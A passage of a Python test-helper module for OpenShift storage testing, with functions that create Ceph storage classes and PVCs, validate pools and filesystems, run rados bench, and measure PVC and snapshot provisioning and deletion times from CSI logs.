encryption_kms_id (str): ID of the KMS entry from connection details
fs_name (str): the name of the filesystem for CephFS StorageClass
Returns:
OCS: An OCS instance for the storage class
"""
yamls = {
constants.CEPHBLOCKPOOL: constants.CSI_RBD_STORAGECLASS_YAML,
constants.CEPHFILESYSTEM: constants.CSI_CEPHFS_STORAGECLASS_YAML,
}
sc_data = dict()
sc_data = templating.load_yaml(yamls[interface_type])
if interface_type == constants.CEPHBLOCKPOOL:
interface = constants.RBD_INTERFACE
sc_data["provisioner"] = (
provisioner if provisioner else defaults.RBD_PROVISIONER
)
if rbd_thick_provision:
sc_data["parameters"]["thickProvision"] = "true"
if encrypted:
# Avoid circular imports
from ocs_ci.utility.kms import get_encryption_kmsid
sc_data["parameters"]["encrypted"] = "true"
sc_data["parameters"]["encryptionKMSID"] = (
encryption_kms_id if encryption_kms_id else get_encryption_kmsid()[0]
)
elif interface_type == constants.CEPHFILESYSTEM:
interface = constants.CEPHFS_INTERFACE
sc_data["parameters"]["fsName"] = fs_name if fs_name else get_cephfs_name()
sc_data["provisioner"] = (
provisioner if provisioner else defaults.CEPHFS_PROVISIONER
)
sc_data["parameters"]["pool"] = interface_name
sc_data["metadata"]["name"] = (
sc_name
if sc_name
else create_unique_resource_name(f"test-{interface}", "storageclass")
)
sc_data["metadata"]["namespace"] = defaults.ROOK_CLUSTER_NAMESPACE
for key in ["node-stage", "provisioner", "controller-expand"]:
sc_data["parameters"][f"csi.storage.k8s.io/{key}-secret-name"] = secret_name
sc_data["parameters"][
f"csi.storage.k8s.io/{key}-secret-namespace"
] = defaults.ROOK_CLUSTER_NAMESPACE
sc_data["parameters"]["clusterID"] = defaults.ROOK_CLUSTER_NAMESPACE
sc_data["reclaimPolicy"] = reclaim_policy
try:
del sc_data["parameters"]["userid"]
except KeyError:
pass
return create_resource(**sc_data)
def create_pvc(
sc_name,
pvc_name=None,
namespace=defaults.ROOK_CLUSTER_NAMESPACE,
size=None,
do_reload=True,
access_mode=constants.ACCESS_MODE_RWO,
volume_mode=None,
):
"""
Create a PVC
Args:
sc_name (str): The name of the storage class for the PVC to be
associated with
pvc_name (str): The name of the PVC to create
namespace (str): The namespace for the PVC creation
size (str): Size of pvc to create
do_reload (bool): True for wait for reloading PVC after its creation, False otherwise
access_mode (str): The access mode to be used for the PVC
volume_mode (str): Volume mode for rbd RWX pvc i.e. 'Block'
Returns:
PVC: PVC instance
"""
pvc_data = templating.load_yaml(constants.CSI_PVC_YAML)
pvc_data["metadata"]["name"] = (
pvc_name if pvc_name else create_unique_resource_name("test", "pvc")
)
pvc_data["metadata"]["namespace"] = namespace
pvc_data["spec"]["accessModes"] = [access_mode]
pvc_data["spec"]["storageClassName"] = sc_name
if size:
pvc_data["spec"]["resources"]["requests"]["storage"] = size
if volume_mode:
pvc_data["spec"]["volumeMode"] = volume_mode
ocs_obj = pvc.PVC(**pvc_data)
created_pvc = ocs_obj.create(do_reload=do_reload)
assert created_pvc, f"Failed to create resource {pvc_name}"
return ocs_obj
def create_multiple_pvcs(
sc_name,
namespace,
number_of_pvc=1,
size=None,
do_reload=False,
access_mode=constants.ACCESS_MODE_RWO,
burst=False,
):
"""
Create one or more PVC as a bulk or one by one
Args:
sc_name (str): The name of the storage class to provision the PVCs from
namespace (str): The namespace for the PVCs creation
number_of_pvc (int): Number of PVCs to be created
size (str): The size of the PVCs to create
do_reload (bool): True for wait for reloading PVC after its creation,
False otherwise
access_mode (str): The kind of access mode for PVC
burst (bool): True for bulk creation, False ( default) for multiple creation
Returns:
ocs_objs (list): List of PVC objects
tmpdir (str): The full path of the directory in which the yamls for pvc objects creation reside
"""
if not burst:
if access_mode == "ReadWriteMany" and "rbd" in sc_name:
volume_mode = "Block"
else:
volume_mode = None
return [
create_pvc(
sc_name=sc_name,
size=size,
namespace=namespace,
do_reload=do_reload,
access_mode=access_mode,
volume_mode=volume_mode,
)
for _ in range(number_of_pvc)
]
pvc_data = templating.load_yaml(constants.CSI_PVC_YAML)
pvc_data["metadata"]["namespace"] = namespace
pvc_data["spec"]["accessModes"] = [access_mode]
pvc_data["spec"]["storageClassName"] = sc_name
if size:
pvc_data["spec"]["resources"]["requests"]["storage"] = size
if access_mode == "ReadWriteMany" and "rbd" in sc_name:
pvc_data["spec"]["volumeMode"] = "Block"
else:
pvc_data["spec"]["volumeMode"] = None
# Creating tem directory to hold the files for the PVC creation
tmpdir = tempfile.mkdtemp()
logger.info("Creating the PVC yaml files for creation in bulk")
ocs_objs = []
for _ in range(number_of_pvc):
name = create_unique_resource_name("test", "pvc")
logger.info(f"Adding PVC with name {name}")
pvc_data["metadata"]["name"] = name
templating.dump_data_to_temp_yaml(pvc_data, f"{tmpdir}/{name}.yaml")
ocs_objs.append(pvc.PVC(**pvc_data))
logger.info("Creating all PVCs as bulk")
oc = OCP(kind="pod", namespace=namespace)
cmd = f"create -f {tmpdir}/"
oc.exec_oc_cmd(command=cmd, out_yaml_format=False)
# Letting the system 1 sec for each PVC to create.
# this will prevent any other command from running in the system in this
# period of time.
logger.info(
f"Going to sleep for {number_of_pvc} sec. "
"until starting verify that PVCs was created."
)
time.sleep(number_of_pvc)
return ocs_objs, tmpdir
def delete_bulk_pvcs(pvc_yaml_dir, pv_names_list, namespace):
"""
Deletes all the pvcs created from yaml file in a provided dir
Args:
pvc_yaml_dir (str): Directory in which yaml file resides
pv_names_list (str): List of pv objects to be deleted
"""
oc = OCP(kind="pod", namespace=namespace)
cmd = f"delete -f {pvc_yaml_dir}/"
oc.exec_oc_cmd(command=cmd, out_yaml_format=False)
time.sleep(len(pv_names_list) / 2)
for pv_name in pv_names_list:
validate_pv_delete(pv_name)
def verify_block_pool_exists(pool_name):
"""
Verify if a Ceph block pool exist
Args:
pool_name (str): The name of the Ceph block pool
Returns:
bool: True if the Ceph block pool exists, False otherwise
"""
logger.info(f"Verifying that block pool {pool_name} exists")
ct_pod = pod.get_ceph_tools_pod()
try:
for pools in TimeoutSampler(60, 3, ct_pod.exec_ceph_cmd, "ceph osd lspools"):
logger.info(f"POOLS are {pools}")
for pool in pools:
if pool_name in pool.get("poolname"):
return True
except TimeoutExpiredError:
return False
def get_pool_cr(pool_name):
"""
Get the pool CR even if the kind is unknown.
Args:
pool_name (str): The name of the pool to get the CR for.
Returns:
dict: If the resource is found, None otherwise.
"""
logger.info(f"Checking if pool {pool_name} is kind of {constants.CEPHBLOCKPOOL}")
ocp_kind_cephblockpool = ocp.OCP(
kind=constants.CEPHBLOCKPOOL, namespace=config.ENV_DATA["cluster_namespace"]
)
pool_cr = ocp_kind_cephblockpool.get(resource_name=pool_name, dont_raise=True)
if pool_cr is not None:
return pool_cr
else:
logger.info(
f"Pool {pool_name} is not kind={constants.CEPHBLOCKPOOL}"
f", checkging if it is kind={constants.CEPHFILESYSTEM}"
)
ocp_kind_cephfilesystem = ocp.OCP(
kind="CephFilesystem",
namespace=config.ENV_DATA["cluster_namespace"],
)
pool_cr = ocp_kind_cephfilesystem.get(resource_name=pool_name, dont_raise=True)
return pool_cr
def get_admin_key():
"""
Fetches admin key secret from Ceph
Returns:
str: The admin key
"""
ct_pod = pod.get_ceph_tools_pod()
out = ct_pod.exec_ceph_cmd("ceph auth get-key client.admin")
return out["key"]
def get_cephfs_data_pool_name():
"""
Fetches ceph fs datapool name from Ceph
Returns:
str: fs datapool name
"""
ct_pod = pod.get_ceph_tools_pod()
out = ct_pod.exec_ceph_cmd("ceph fs ls")
return out[0]["data_pools"][0]
def validate_cephfilesystem(fs_name):
"""
Verify CephFileSystem exists at Ceph and OCP
Args:
fs_name (str): The name of the Ceph FileSystem
Returns:
bool: True if CephFileSystem is created at Ceph and OCP side else
will return False with valid msg i.e Failure cause
"""
cfs = ocp.OCP(
kind=constants.CEPHFILESYSTEM, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
ct_pod = pod.get_ceph_tools_pod()
ceph_validate = False
ocp_validate = False
result = cfs.get(resource_name=fs_name)
if result.get("metadata").get("name"):
logger.info("Filesystem %s got created from Openshift Side", fs_name)
ocp_validate = True
else:
logger.info("Filesystem %s was not create at Openshift Side", fs_name)
return False
try:
for pools in TimeoutSampler(60, 3, ct_pod.exec_ceph_cmd, "ceph fs ls"):
for out in pools:
result = out.get("name")
if result == fs_name:
logger.info("FileSystem %s got created from Ceph Side", fs_name)
ceph_validate = True
break
else:
logger.error("FileSystem %s was not present at Ceph Side", fs_name)
ceph_validate = False
if ceph_validate:
break
except TimeoutExpiredError:
pass
return True if (ceph_validate and ocp_validate) else False
def create_ocs_object_from_kind_and_name(
kind, resource_name, namespace=constants.OPENSHIFT_STORAGE_NAMESPACE
):
"""
Create OCS object from kind and name
Args:
kind (str): resource kind like CephBlockPool, pvc.
resource_name (str): name of the resource.
namespace (str) the namespace of the resource.
Returns:
ocs_ci.ocs.resources.ocs.OCS (obj): returns OCS object from kind and name.
"""
ocp_object = OCP(kind=kind, resource_name=resource_name, namespace=namespace).get()
return OCS(**ocp_object)
def remove_ocs_object_from_list(kind, resource_name, object_list):
"""
Given a list of OCS objects, the function removes the object with kind and resource from the list
Args:
kind (str): resource kind like CephBlockPool, pvc.
resource_name (str): name of the resource.
object_list (array): Array of OCS objects.
Returns:
(array): Array of OCS objects without removed object.
"""
for obj in object_list:
if obj.name == resource_name and obj.kind == kind:
object_list.remove(obj)
return object_list
def get_all_storageclass_names():
"""
Function for getting all storageclass
Returns:
list: list of storageclass name
"""
sc_obj = ocp.OCP(
kind=constants.STORAGECLASS, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
result = sc_obj.get()
sample = result["items"]
storageclass = [
item.get("metadata").get("name")
for item in sample
if (
(item.get("metadata").get("name") not in constants.IGNORE_SC_GP2)
and (item.get("metadata").get("name") not in constants.IGNORE_SC_FLEX)
)
]
return storageclass
def delete_storageclasses(sc_objs):
""" "
Function for Deleting storageclasses
Args:
sc_objs (list): List of SC objects for deletion
Returns:
bool: True if deletion is successful
"""
for sc in sc_objs:
logger.info("Deleting StorageClass with name %s", sc.name)
sc.delete()
return True
def get_cephblockpool_names():
"""
Function for getting all CephBlockPool
Returns:
list: list of cephblockpool name
"""
pool_obj = ocp.OCP(
kind=constants.CEPHBLOCKPOOL, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
result = pool_obj.get()
sample = result["items"]
pool_list = [item.get("metadata").get("name") for item in sample]
return pool_list
def delete_cephblockpools(cbp_objs):
"""
Function for deleting CephBlockPool
Args:
cbp_objs (list): List of CBP objects for deletion
Returns:
bool: True if deletion of CephBlockPool is successful
"""
for cbp in cbp_objs:
logger.info("Deleting CephBlockPool with name %s", cbp.name)
cbp.delete()
return True
def get_cephfs_name():
"""
Function to retrive CephFS name
Returns:
str: Name of CFS
"""
ct_pod = pod.get_ceph_tools_pod()
result = ct_pod.exec_ceph_cmd("ceph fs ls")
return result[0]["name"]
def pull_images(image_name):
"""
Function to pull images on all nodes
Args:
image_name (str): Name of the container image to be pulled
Returns: None
"""
node_objs = node.get_node_objs(node.get_worker_nodes())
for node_obj in node_objs:
logging.info(f'pulling image "{image_name} " on node {node_obj.name}')
assert node_obj.ocp.exec_oc_debug_cmd(
node_obj.name, cmd_list=[f"podman pull {image_name}"]
)
def run_io_with_rados_bench(**kw):
"""
A task for radosbench. Runs radosbench command on specified pod . If
parameters are not provided task assumes few default parameters.This task
runs command in synchronous fashion.
Args:
kw (dict): a dictionary of various radosbench parameters.
ex::
pool_name:pool
pg_num:number of pgs for pool
op: type of operation {read, write}
cleanup: True OR False
Returns:
ret: return value of radosbench command
"""
logger.info("Running radosbench task")
ceph_pods = kw.get("ceph_pods") # list of pod objects of ceph cluster
config = kw.get("config")
role = config.get("role", "client")
clients = [cpod for cpod in ceph_pods if role in cpod.roles]
idx = config.get("idx", 0)
client = clients[idx]
op = config.get("op", "write")
cleanup = ["--no-cleanup", "--cleanup"][config.get("cleanup", True)]
pool = config.get("pool")
block = str(config.get("size", 4 << 20))
time = config.get("time", 120)
time = str(time)
rados_bench = (
f"rados --no-log-to-stderr "
f"-b {block} "
f"-p {pool} "
f"bench "
f"{time} "
f"{op} "
f"{cleanup} "
)
try:
ret = client.exec_ceph_cmd(ceph_cmd=rados_bench)
except CommandFailed as ex:
logger.error(f"Rados bench failed\n Error is: {ex}")
return False
logger.info(ret)
logger.info("Finished radosbench")
return ret
def get_all_pvs():
"""
Gets all pv in openshift-storage namespace
Returns:
dict: Dict of all pv in openshift-storage namespace
"""
ocp_pv_obj = ocp.OCP(kind=constants.PV, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
return ocp_pv_obj.get()
# TODO: revert counts of tries and delay,BZ 1726266
@retry(AssertionError, tries=20, delay=10, backoff=1)
def validate_pv_delete(pv_name):
"""
validates if pv is deleted after pvc deletion
Args:
pv_name (str): pv from pvc to validates
Returns:
bool: True if deletion is successful
Raises:
AssertionError: If pv is not deleted
"""
ocp_pv_obj = ocp.OCP(kind=constants.PV, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
try:
if ocp_pv_obj.get(resource_name=pv_name):
msg = f"{constants.PV} {pv_name} is not deleted after PVC deletion"
raise AssertionError(msg)
except CommandFailed:
return True
def create_pods(
pvc_objs, pod_factory, interface, pods_for_rwx=1, status="", nodes=None
):
"""
Create pods
Args:
pvc_objs (list): List of ocs_ci.ocs.resources.pvc.PVC instances
pod_factory (function): pod_factory function
interface (int): Interface type
pods_for_rwx (int): Number of pods to be created if access mode of
PVC is RWX
status (str): If provided, wait for desired state of each pod before
creating next one
nodes (list): Node name for each pod will be selected from this list.
Returns:
list: list of Pod objects
"""
pod_objs = []
nodes_iter = cycle(nodes) if nodes else None
for pvc_obj in pvc_objs:
volume_mode = getattr(
pvc_obj, "volume_mode", pvc_obj.get()["spec"]["volumeMode"]
)
access_mode = getattr(pvc_obj, "access_mode", pvc_obj.get_pvc_access_mode)
if volume_mode == "Block":
pod_dict = constants.CSI_RBD_RAW_BLOCK_POD_YAML
raw_block_pv = True
else:
raw_block_pv = False
pod_dict = ""
if access_mode == constants.ACCESS_MODE_RWX:
pod_obj_rwx = [
pod_factory(
interface=interface,
pvc=pvc_obj,
status=status,
node_name=next(nodes_iter) if nodes_iter else None,
pod_dict_path=pod_dict,
raw_block_pv=raw_block_pv,
)
for _ in range(1, pods_for_rwx)
]
pod_objs.extend(pod_obj_rwx)
pod_obj = pod_factory(
interface=interface,
pvc=pvc_obj,
status=status,
node_name=next(nodes_iter) if nodes_iter else None,
pod_dict_path=pod_dict,
raw_block_pv=raw_block_pv,
)
pod_objs.append(pod_obj)
return pod_objs
def create_build_from_docker_image(
image_name,
install_package,
namespace,
source_image="quay.io/ocsci/fedora",
source_image_label="latest",
):
"""
Allows to create a build config using a Dockerfile specified as an
argument, eg.::
$ oc new-build -D $'FROM centos:7\\nRUN yum install -y httpd'
creates a build with ``httpd`` installed.
Args:
image_name (str): Name of the image to be created
source_image (str): Source image to build docker image from,
defaults to Centos as base image
namespace (str): project where build config should be created
source_image_label (str): Tag to use along with the image name,
defaults to 'latest'
install_package (str): package to install over the base image
Returns:
ocs_ci.ocs.ocp.OCP (obj): The OCP object for the image
Fails on UnavailableBuildException exception if build creation
fails
"""
base_image = source_image + ":" + source_image_label
if config.DEPLOYMENT.get("disconnected"):
base_image = mirror_image(image=base_image)
cmd = f"yum install -y {install_package}"
http_proxy, https_proxy, no_proxy = get_cluster_proxies()
if http_proxy:
cmd = (
f"http_proxy={http_proxy} https_proxy={https_proxy} "
f"no_proxy='{no_proxy}' {cmd}"
)
docker_file = f"FROM {base_image}\n " f" RUN {cmd}\n" f"CMD tail -f /dev/null"
command = f"new-build -D $'{docker_file}' --name={image_name}"
kubeconfig = os.getenv("KUBECONFIG")
oc_cmd = f"oc -n {namespace} "
if kubeconfig:
oc_cmd += f"--kubeconfig {kubeconfig} "
oc_cmd += command
logger.info(f"Running command {oc_cmd}")
result = run(oc_cmd, stdout=PIPE, stderr=PIPE, timeout=15, shell=True)
if result.stderr.decode():
raise UnavailableBuildException(
f"Build creation failed with error: {result.stderr.decode()}"
)
out = result.stdout.decode()
logger.info(out)
if "Success" in out:
# Build becomes ready once build pod goes into Completed state
pod_obj = OCP(kind="Pod", resource_name=image_name)
if pod_obj.wait_for_resource(
condition="Completed",
resource_name=f"{image_name}" + "-1-build",
timeout=300,
sleep=30,
):
logger.info(f"build {image_name} ready")
set_image_lookup(image_name)
logger.info(f"image {image_name} can now be consumed")
image_stream_obj = OCP(kind="ImageStream", resource_name=image_name)
return image_stream_obj
else:
raise UnavailableBuildException("Build creation failed")
def set_image_lookup(image_name):
"""
Function to enable lookup, which allows reference to the image stream tag
in the image field of the object. Example::
$ oc set image-lookup mysql
$ oc run mysql --image=mysql
Args:
image_name (str): Name of the image stream to pull
the image locally
Returns:
str: output of set image-lookup command
"""
ocp_obj = ocp.OCP(kind="ImageStream")
command = f"set image-lookup {image_name}"
logger.info(f'image lookup for image"{image_name}" is set')
status = ocp_obj.exec_oc_cmd(command)
return status
def get_snapshot_time(interface, snap_name, status):
"""
Get the starting/ending creation time of a PVC based on provisioner logs
The time and date extraction code below has been modified to read
the month and day data in the logs. This fixes an error where negative
time values are calculated when test runs cross midnight. Also, previous
calculations would not set the year, and so the calculations were done
as if the year were 1900. This is not a problem except that 1900 was
not a leap year and so the next February 29th would throw ValueErrors
for the whole day. To avoid this problem, changes were made to also
include the current year.
Incorrect times will still be given for tests that cross over from
December 31 to January 1.
Args:
interface (str): The interface backed the PVC
pvc_name (str / list): Name of the PVC(s) for creation time
the list will be list of pvc objects
status (str): the status that we want to get - Start / End
Returns:
datetime object: Time of PVC(s) creation
"""
def get_pattern_time(log, snapname, pattern):
"""
Get the time of pattern in the log
Args:
log (list): list of all lines in the log file
snapname (str): the name of the snapshot
pattern (str): the pattern that need to be found in the log (start / bound)
Returns:
str: string of the pattern timestamp in the log, if not found None
"""
this_year = str(datetime.datetime.now().year)
for line in log:
if re.search(snapname, line) and re.search(pattern, line):
mon_day = " ".join(line.split(" ")[0:2])
return f"{this_year} {mon_day}"
return None
logs = ""
# the starting and ending time are taken from different logs,
# the start creation time is taken from the snapshot controller, while
# the end creation time is taken from the csi snapshot driver
if status.lower() == "start":
pattern = "Creating content for snapshot"
# Get the snapshoter-controller pod
pod_name = pod.get_csi_snapshoter_pod()
logs = pod.get_pod_logs(
pod_name, namespace="openshift-cluster-storage-operator"
)
elif status.lower() == "end":
pattern = "readyToUse true"
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
for log_pod in pod_name:
logs += pod.get_pod_logs(log_pod, "csi-snapshotter")
else:
logger.error(f"the status {status} is invalid.")
return None
logs = logs.split("\n")
stat = None
# Extract the time for the one PVC snapshot provisioning
if isinstance(snap_name, str):
stat = get_pattern_time(logs, snap_name, pattern)
# Extract the time for the list of PVCs snapshot provisioning
if isinstance(snap_name, list):
all_stats = []
for snapname in snap_name:
all_stats.append(get_pattern_time(logs, snapname.name, pattern))
all_stats = sorted(all_stats)
if status.lower() == "end":
stat = all_stats[-1] # return the highest time
elif status.lower() == "start":
stat = all_stats[0] # return the lowest time
if stat:
return datetime.datetime.strptime(stat, DATE_TIME_FORMAT)
else:
return None
def measure_snapshot_creation_time(interface, snap_name, snap_con_name, snap_uid=None):
"""
Measure Snapshot creation time based on logs
Args:
snap_name (str): Name of the snapshot for creation time measurement
Returns:
float: Creation time for the snapshot
"""
start = get_snapshot_time(interface, snap_name, status="start")
end = get_snapshot_time(interface, snap_con_name, status="end")
logs = ""
if start and end:
total = end - start
return total.total_seconds()
else:
# at 4.8 the log messages was changed, so need different parsing
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
for log_pod in pod_name:
logger.info(f"Read logs from {log_pod}")
logs += pod.get_pod_logs(log_pod, "csi-snapshotter")
logs = logs.split("\n")
pattern = "CSI CreateSnapshot: snapshot-"
for line in logs:
if (
re.search(snap_uid, line)
and re.search(pattern, line)
and re.search("readyToUse \\[true\\]", line)
):
# The creation time log is in nanosecond, so, it need to convert to seconds.
results = int(line.split()[-5].split(":")[1].replace("]", "")) * (
10 ** -9
)
return float(f"{results:.3f}")
return None
def get_provision_time(interface, pvc_name, status="start"):
"""
Get the starting/ending creation time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pvc_name (str / list): Name of the PVC(s) for creation time
the list will be list of pvc objects
status (str): the status that we want to get - Start / End
Returns:
datetime object: Time of PVC(s) creation
"""
# Define the status that need to retrieve
operation = "started"
if status.lower() == "end":
operation = "succeeded"
this_year = str(datetime.datetime.now().year)
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
# Extract the time for the one PVC provisioning
if isinstance(pvc_name, str):
stat = [i for i in logs if re.search(f"provision.*{pvc_name}.*{operation}", i)]
mon_day = " ".join(stat[0].split(" ")[0:2])
stat = f"{this_year} {mon_day}"
# Extract the time for the list of PVCs provisioning
if isinstance(pvc_name, list):
all_stats = []
for i in range(0, len(pvc_name)):
name = pvc_name[i].name
stat = [i for i in logs if re.search(f"provision.*{name}.*{operation}", i)]
mon_day = " ".join(stat[0].split(" ")[0:2])
stat = f"{this_year} {mon_day}"
all_stats.append(stat)
all_stats = sorted(all_stats)
if status.lower() == "end":
stat = all_stats[-1] # return the highest time
elif status.lower() == "start":
stat = all_stats[0] # return the lowest time
return datetime.datetime.strptime(stat, DATE_TIME_FORMAT)
def get_start_creation_time(interface, pvc_name):
"""
Get the starting creation time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pvc_name (str): Name of the PVC for creation time measurement
Returns:
datetime object: Start time of PVC creation
"""
this_year = str(datetime.datetime.now().year)
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
# Extract the starting time for the PVC provisioning
start = [i for i in logs if re.search(f"provision.*{pvc_name}.*started", i)]
mon_day = " ".join(start[0].split(" ")[0:2])
start = f"{this_year} {mon_day}"
return datetime.datetime.strptime(start, DATE_TIME_FORMAT)
def get_end_creation_time(interface, pvc_name):
"""
Get the ending creation time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pvc_name (str): Name of the PVC for creation time measurement
Returns:
datetime object: End time of PVC creation
"""
this_year = str(datetime.datetime.now().year)
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
# Extract the starting time for the PVC provisioning
end = [i for i in logs if re.search(f"provision.*{pvc_name}.*succeeded", i)]
# End provisioning string may appear in logs several times, take here the latest one
mon_day = " ".join(end[-1].split(" ")[0:2])
end = f"{this_year} {mon_day}"
return datetime.datetime.strptime(end, DATE_TIME_FORMAT)
def measure_pvc_creation_time(interface, pvc_name):
"""
Measure PVC creation time based on logs
Args:
interface (str): The interface backed the PVC pvc_name (str): Name of the PVC for creation time measurement
Returns:
float: Creation time for the PVC
"""
start = get_start_creation_time(interface=interface, pvc_name=pvc_name)
end = get_end_creation_time(interface=interface, pvc_name=pvc_name)
total = end - start
return total.total_seconds()
def measure_pvc_creation_time_bulk(interface, pvc_name_list, wait_time=60):
"""
Measure PVC creation time of bulk PVC based on logs.
Args:
interface (str): The interface backed the PVC
pvc_name_list (list): List of PVC Names for measuring creation time
wait_time (int): Seconds to wait before collecting CSI log
Returns:
pvc_dict (dict): Dictionary of pvc_name with creation time.
"""
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# due to some delay in CSI log generation added wait
time.sleep(wait_time)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
loop_counter = 0
while True:
no_data_list = list()
for name in pvc_name_list:
# check if PV data present in CSI logs
start = [i for i in logs if re.search(f"provision.*{name}.*started", i)]
end = [i for i in logs if re.search(f"provision.*{name}.*succeeded", i)]
if not start or not end:
no_data_list.append(name)
if no_data_list:
# Clear and get CSI logs after 60secs
logging.info(f"PVC count without CSI create log data {len(no_data_list)}")
logs.clear()
time.sleep(wait_time)
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
loop_counter += 1
if loop_counter >= 6:
logging.info("Waited for more than 6mins still no data")
raise UnexpectedBehaviour(
f"There is no pvc creation data in CSI logs for {no_data_list}"
)
continue
else:
break
pvc_dict = dict()
this_year = str(datetime.datetime.now().year)
for pvc_name in pvc_name_list:
# Extract the starting time for the PVC provisioning
start = [i for i in logs if re.search(f"provision.*{pvc_name}.*started", i)]
mon_day = " ".join(start[0].split(" ")[0:2])
start = f"{this_year} {mon_day}"
start_time = datetime.datetime.strptime(start, DATE_TIME_FORMAT)
# Extract the end time for the PVC provisioning
end = [i for i in logs if re.search(f"provision.*{pvc_name}.*succeeded", i)]
mon_day = " ".join(end[0].split(" ")[0:2])
end = f"{this_year} {mon_day}"
end_time = datetime.datetime.strptime(end, DATE_TIME_FORMAT)
total = end_time - start_time
pvc_dict[pvc_name] = total.total_seconds()
return pvc_dict
def measure_pv_deletion_time_bulk(
interface, pv_name_list, wait_time=60, return_log_times=False
):
"""
Measure PV deletion time of bulk PV, based on logs.
Args:
interface (str): The interface backed the PV
pv_name_list (list): List of PV Names for measuring deletion time
wait_time (int): Seconds to wait before collecting CSI log
return_log_times (bool): Determines the return value -- if False, dictionary of pv_names with the deletion time
is returned; if True -- the dictionary of pv_names with the tuple of (srart_deletion_time,
end_deletion_time) is returned
Returns:
pv_dict (dict): Dictionary where the pv_names are the keys. The value of the dictionary depend on the
return_log_times argument value and are either the corresponding deletion times (when return_log_times
is False) or a tuple of (start_deletion_time, end_deletion_time) as they appear in the logs
"""
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# due to some delay in CSI log generation added wait
time.sleep(wait_time)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
loop_counter = 0
while True:
no_data_list = list()
for pv in pv_name_list:
# check if PV data present in CSI logs
start = [i for i in logs if re.search(f'delete "{pv}": started', i)]
end = [i for i in logs if re.search(f'delete "{pv}": succeeded', i)]
if not start or not end:
no_data_list.append(pv)
if no_data_list:
# Clear and get CSI logs after 60secs
logging.info(f"PV count without CSI delete log data {len(no_data_list)}")
logs.clear()
time.sleep(wait_time)
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
loop_counter += 1
if loop_counter >= 6:
logging.info("Waited for more than 6mins still no data")
raise UnexpectedBehaviour(
f"There is no pv deletion data in CSI logs for {no_data_list}"
)
continue
else:
break
pv_dict = dict()
this_year = str(datetime.datetime.now().year)
for pv_name in pv_name_list:
# Extract the deletion start time for the PV
start = [i for i in logs if re.search(f'delete "{pv_name}": started', i)]
mon_day = " ".join(start[0].split(" ")[0:2])
start_tm = f"{this_year} {mon_day}"
start_time = datetime.datetime.strptime(start_tm, DATE_TIME_FORMAT)
# Extract the deletion end time for the PV
end = [i for i in logs if re.search(f'delete "{pv_name}": succeeded', i)]
mon_day = " ".join(end[0].split(" ")[0:2])
end_tm = f"{this_year} {mon_day}"
end_time = datetime.datetime.strptime(end_tm, DATE_TIME_FORMAT)
total = end_time - start_time
if not return_log_times:
pv_dict[pv_name] = total.total_seconds()
else:
pv_dict[pv_name] = (start_tm, end_tm)
return pv_dict
def get_start_deletion_time(interface, pv_name):
"""
Get the starting deletion time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pvc_name (str): Name of the PVC for deletion time measurement
Returns:
datetime object: Start time of PVC deletion
"""
this_year = str(datetime.datetime.now().year)
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
# Extract the starting time for the PVC deletion
start = [i for i in logs if re.search(f'delete "{pv_name}": started', i)]
mon_day = " ".join(start[0].split(" ")[0:2])
start = f"{this_year} {mon_day}"
return datetime.datetime.strptime(start, DATE_TIME_FORMAT)
def get_end_deletion_time(interface, pv_name):
"""
Get the ending deletion time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pv_name (str): Name of the PVC for deletion time measurement
Returns:
datetime object: End time of PVC deletion
"""
this_year = str(datetime.datetime.now().year)
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
# Extract the starting time for the PV deletion
end = [i for i in logs if re.search(f'delete "{pv_name}": succeeded', i)]
mon_day = " ".join(end[0].split(" ")[0:2])
end = f"{this_year} {mon_day}"
return datetime.datetime.strptime(end, DATE_TIME_FORMAT)
def measure_pvc_deletion_time(interface, pv_name):
"""
Measure PVC deletion time based on logs
Args:
interface (str): The interface backed the PVC
